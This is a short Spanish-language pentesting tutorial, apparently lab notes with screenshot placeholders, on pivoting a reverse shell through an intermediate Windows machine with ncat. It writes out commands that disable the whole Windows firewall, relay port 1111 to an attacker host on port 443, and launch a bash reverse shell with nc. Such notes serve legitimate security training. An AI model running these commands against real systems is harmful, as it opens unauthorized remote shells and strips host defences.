En windows, en vez de usar socat podemos usar ncat para permitir el tráfico de una reverse shell por parte de una máquina 3 pasando por una máquina windows intermedia. Por ejemplo, desde el Kali nos ponemos a la escucha: {{pasted_image_20240303120530.png|}} A continuación, en la máquina intermedia podemos desactivar el firewall para evitar tener problemas: netsh advfirewall set allprofiles state off {{pasted_image_20240303154211.png|}} Ahora desde la máquina Windows intermedia decimos que todo el tráfico que recibamos por ejemplo por el puerto 1111 lo vamos a enviar al puerto 443 de la máquina atacante: ncat -l -p 1111 -c "ncat 192.168.0.20 443" {{pasted_image_20240303120641.png|}} Entonces ahora desde la máquina 3 enviamos la reverse shell a la máquina windows 7 intermedia por el puerto 1111 y deberíamos de recibir la conexión en nuestro Kali: nc -c bash 10.10.10.129 1111 {{pasted_image_20240303120735.png|}} Y recibimos la conexión: {{pasted_image_20240303120747.png|}}